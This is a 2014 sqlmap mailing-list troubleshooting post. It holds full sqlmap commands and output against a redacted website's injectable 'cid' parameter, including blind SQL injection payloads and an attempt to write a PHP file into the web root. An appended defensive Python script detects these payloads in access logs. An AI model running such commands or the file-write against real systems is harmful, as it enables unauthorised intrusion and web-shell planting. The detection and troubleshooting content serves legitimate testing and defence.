[sqlmap-users] executing query with NONE result
From: Alok K. <myp...@gm...> - 2014-01-22 05:28:07
Hello members, I need your help to solve this mystery. My manual assessment against a web application revealed a possible SQL injection vulnerability, which has been reconfirmed using the Netsparker automated web application assessment tool. I then used sqlmap to exploit the SQL injection flaw to do something interesting, but none of it worked for me; even sqlmap says the parameter is injectable, and in fact it actually exploited the issue, but unfortunately with ZERO results. I tried almost everything from "--current-db, --dbs, --banner", and everything was found to be executed with the result value NONE. I even tried --sql-shell, which gave me an sql-shell> prompt, but whatever query I tried gave ZERO results without any error. I did try some custom queries, but that didn't work because of the stacked query limitation. I'm positively sure that the target parameter is injectable but couldn't make out why it is not executing and/or giving any response to my query. Please help me with this. Thanks in advance!

I have also posted two of the queries which I executed for your reference.

SQLMap query output
**************************************************************
First query
**************************************************************
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.xxxxxx.com/xxx10.php?cid=1111111 --current-db --no-cast --time-sec=10 -t xxix-output

sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 18:54:00

[18:54:00] [INFO] setting file for logging HTTP traffic
[18:54:00] [INFO] resuming back-end DBMS 'mysql'
[18:54:00] [INFO] testing connection to the target URL
[18:54:00] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=1111111 AND 1062=1062

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cid=1111111 AND SLEEP(10)
---
[18:54:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
[18:54:00] [INFO] fetching current database
[18:54:00] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:54:00] [INFO] retrieved:
[18:54:01] [INFO] heuristics detected web page charset 'ascii'
[18:54:01] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[18:54:07] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[18:54:08] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current database: None
[18:54:08] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.xxxxxx.com'

[*] shutting down at 18:54:08

**************************************************************
Second query
**************************************************************
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.xxxxxx.com/xxx10.php?cid=1111111 --time-sec=10 --sql-shell

sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 18:18:17

[18:18:17] [INFO] resuming back-end DBMS 'mysql'
[18:18:17] [INFO] testing connection to the target URL
[18:18:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=1111111 AND 1062=1062

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cid=1111111 AND SLEEP(10)
---
[18:18:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
[18:18:18] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> user()
[18:18:25] [INFO] fetching SQL query output: 'user()'
[18:18:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:18:25] [INFO] retrieved:
[18:18:25] [INFO] heuristics detected web page charset 'ascii'
[18:18:26] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[18:18:32] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[18:18:33] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
sql-shell> user() --hex
[18:18:59] [INFO] fetching SQL query output: 'user() --hex'
[18:18:59] [INFO] retrieved:
[18:19:00] [INFO] retrieved:
sql-shell> select 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 into "/var/www/xxxxxx.com/upload.php"; --hex
[18:19:16] [WARNING] execution of custom SQL queries is only available when stacked queries are supported
sql-shell> db_name --hex
[18:19:29] [INFO] fetching SQL query output: 'db_name --hex'
[18:19:29] [INFO] retrieved:
[18:19:29] [INFO] retrieved:
sql-shell> x
[18:19:39] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.xxxxxx.com'

[*] shutting down at 18:19:39
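As an added illustration for readers of this thread (it is not part of the original post and not sqlmap's own code), the following Python script shows what the two injection techniques sqlmap reported above look like from the web server's side. It parses constructed nginx access-log lines carrying the same "AND 1062=1062" and "AND SLEEP(10)" payload shapes, flags each one as boolean-based or time-based blind, and then checks whether the TRUE and FALSE boolean probes came back with identical status and size. That is the one condition under which a boolean-based blind channel carries no information at all, and an empty "retrieved:" line is what it produces on the tester's side. The IP addresses, timestamps, response sizes and the path are constructed, and all function names are mine.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed nginx "combined"-format log lines (IPs, sizes and times are made up);
# the payload shapes are the ones sqlmap reported in the post: AND 1062=1062, AND SLEEP(10).
SAMPLE_LOG = """\
203.0.113.7 - - [22/Jan/2014:18:18:18 +0000] "GET /xxx10.php?cid=1111111 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [22/Jan/2014:18:18:19 +0000] "GET /xxx10.php?cid=1111111%20AND%201062%3D1062 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev"
203.0.113.7 - - [22/Jan/2014:18:18:20 +0000] "GET /xxx10.php?cid=1111111%20AND%201062%3D1063 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev"
203.0.113.7 - - [22/Jan/2014:18:18:31 +0000] "GET /xxx10.php?cid=1111111%20AND%20SLEEP%2810%29 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev"
198.51.100.4 - - [22/Jan/2014:18:18:32 +0000] "GET /xxx10.php?cid=42 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"$'
)
# "AND 1062=1062" style comparisons: the tool sends a true and a false variant and diffs the pages.
TAUTOLOGY_RE = re.compile(r'\b(?:AND|OR)\s+(?P<l>\d+)\s*=\s*(?P<r>\d+)', re.I)
# MySQL delay functions used by time-based blind payloads.
TIME_RE = re.compile(r'\b(?:SLEEP|BENCHMARK)\s*\(', re.I)


def parse_line(line):
    """Parse one combined-format access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["size"] = int(rec["size"]) if rec["size"].isdigit() else 0
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl percent-decodes the values, so %20AND%201062%3D1062 becomes " AND 1062=1062"
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def classify_value(value):
    """Return (technique, condition_is_true) for a decoded parameter value, or (None, None)."""
    m = TAUTOLOGY_RE.search(value)
    if m:
        return "boolean-blind", m.group("l") == m.group("r")
    if TIME_RE.search(value):
        return "time-blind", None
    return None, None


def find_injection_attempts(log_text):
    """Scan log text and return one finding per parameter value that carries a blind-SQLi payload."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            technique, truth = classify_value(value)
            if technique is None:
                continue
            findings.append({
                "ip": rec["ip"], "path": rec["path"], "param": name, "value": value,
                "technique": technique, "condition_true": truth,
                "status": rec["status"], "size": rec["size"],
            })
    return findings


def oracle_indistinguishable(findings):
    """For each (ip, path, param) that received both a TRUE and a FALSE boolean probe, report
    whether the two responses were identical in status and size. Identical responses mean the
    page gives no signal to infer data from, so any blind retrieval comes back empty."""
    pairs = {}
    for f in findings:
        if f["technique"] != "boolean-blind":
            continue
        key = (f["ip"], f["path"], f["param"])
        pairs.setdefault(key, {})[f["condition_true"]] = (f["status"], f["size"])
    return {key: p[True] == p[False] for key, p in pairs.items() if True in p and False in p}


if __name__ == "__main__":
    found = find_injection_attempts(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']} {f['path']} {f['param']}={f['value']!r} -> {f['technique']}")
    print("TRUE/FALSE probes indistinguishable:", oracle_indistinguishable(found))
```

Two points worth noting when reading this against the logs above. First, both sqlmap runs report "a total of 0 HTTP(s) requests" right after "resuming back-end DBMS 'mysql'", which means the injection points were taken from the saved session file rather than re-verified against the live page. Second, a TRUE/FALSE pair that the server answers with byte-identical responses is one explanation that fits empty "retrieved:" lines; it does not prove the cause in this particular case, but it is the first thing a defender reviewing the access log for this host would check, and it is also the signature to alert on: a single client sending the same parameter with paired true and false comparisons and then a delay-function payload.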